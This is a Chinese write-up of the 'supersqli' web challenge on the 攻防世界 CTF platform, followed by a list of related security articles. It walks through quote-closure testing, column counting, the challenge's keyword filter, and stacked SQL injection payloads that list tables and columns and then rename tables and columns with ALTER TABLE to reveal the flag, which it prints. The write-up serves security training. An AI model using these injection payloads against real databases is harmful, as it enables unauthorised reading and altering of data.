攻防世界(CTF)~web-supersqli(详细解题思路)

题目介绍

题目描述"随便注"

先看一下是否存在注入

判断闭合方式

输入1' and 1=1-- -正常回显

输入1'and 1=2-- -无回显,确认是单引号闭合

看一下列数

输入1' order by 2-- - 有回显

输入1' order by 3-- - 报错,由此判断两列

使用union联合注入发现select被过滤了,无法使用联合注入

过滤的内容

复制代码
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

尝试一下堆叠注入

堆叠注入的原理

mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,会一起执行。这就是堆叠注入的基本原理

查看数据库

1';show databases;- --

查看表

1';show tables;-- -

查看两个表的字段(查看表名的时候表名要用反引号包裹)

1919810931114514表

1'; show columns from `1919810931114514`-- -

发现"flag"、"NO"

words表

1'; show columns from `words`-- -

现在虽然已经到了flag字段,但是select被过滤了,我们看不了flag字段,那么我们该怎么查看字段内容呢?

解决方法:改表名

查看过滤的内容发现rename、alert这俩关键字没有被过滤,根据在words表里发现id字段与查询框里的出的数据类型相同,一个是数字,另一个是字符串,所以默认查询的就是words表,我们可以将含有flag字段的表命名为word,然后修改字段名字

第一步:words名改为word1

alter table words rename to word1;

第二步 :把"1919810931114514"数字表名改为 words

alter table `1919810931114514` rename to words;

第三步:把现在的words表中的flag字段名改为id

alter table words change flag id varchar(100);

合在一起构造pyload(也可以分开执行语句)

1'; alter table words rename to word1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);-- -

查看flag

1' or true-- -

复制代码
flag{c168d583ed0d4d7196967b28cbd0b5e9}
相关推荐
痴人说梦梦中人5 小时前
SwaggerFuzzer:一款自动化 OpenAPI/Swagger 接口未授权访问测试工具
网络安全·渗透测试·自动化·api测试·漏洞利用·信息搜集
lubiii_6 小时前
SQL手工测试(MySQL数据库)
数据库·mysql·web安全·网络安全
网安INF10 小时前
ElGamal加密算法:离散对数难题的安全基石
java·网络安全·密码学
网安INF19 小时前
CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)
java·web安全·网络安全·flink·漏洞
lubiii_19 小时前
墨者学院-密码学实训隐写术第二题
web安全·网络安全·密码学
李枫月1 天前
Server2003 B-1 Windows操作系统渗透
网络安全·环境解析·server2003
饮长安千年月1 天前
JavaSec-SpringBoot框架
java·spring boot·后端·计算机网络·安全·web安全·网络安全
Bruce_Liuxiaowei1 天前
PHP文件包含漏洞详解:原理、利用与防御
开发语言·网络安全·php·文件包含
2501_915106321 天前
Flutter、React Native 项目如何搞定 iOS 上架?从构建 IPA 到上传 App Store 的实战流程全解析
websocket·网络协议·tcp/ip·http·网络安全·https·udp
网安INF1 天前
CVE-2023-25194源码分析与漏洞复现(Kafka JNDI注入)
java·web安全·网络安全·kafka·漏洞·jndi注入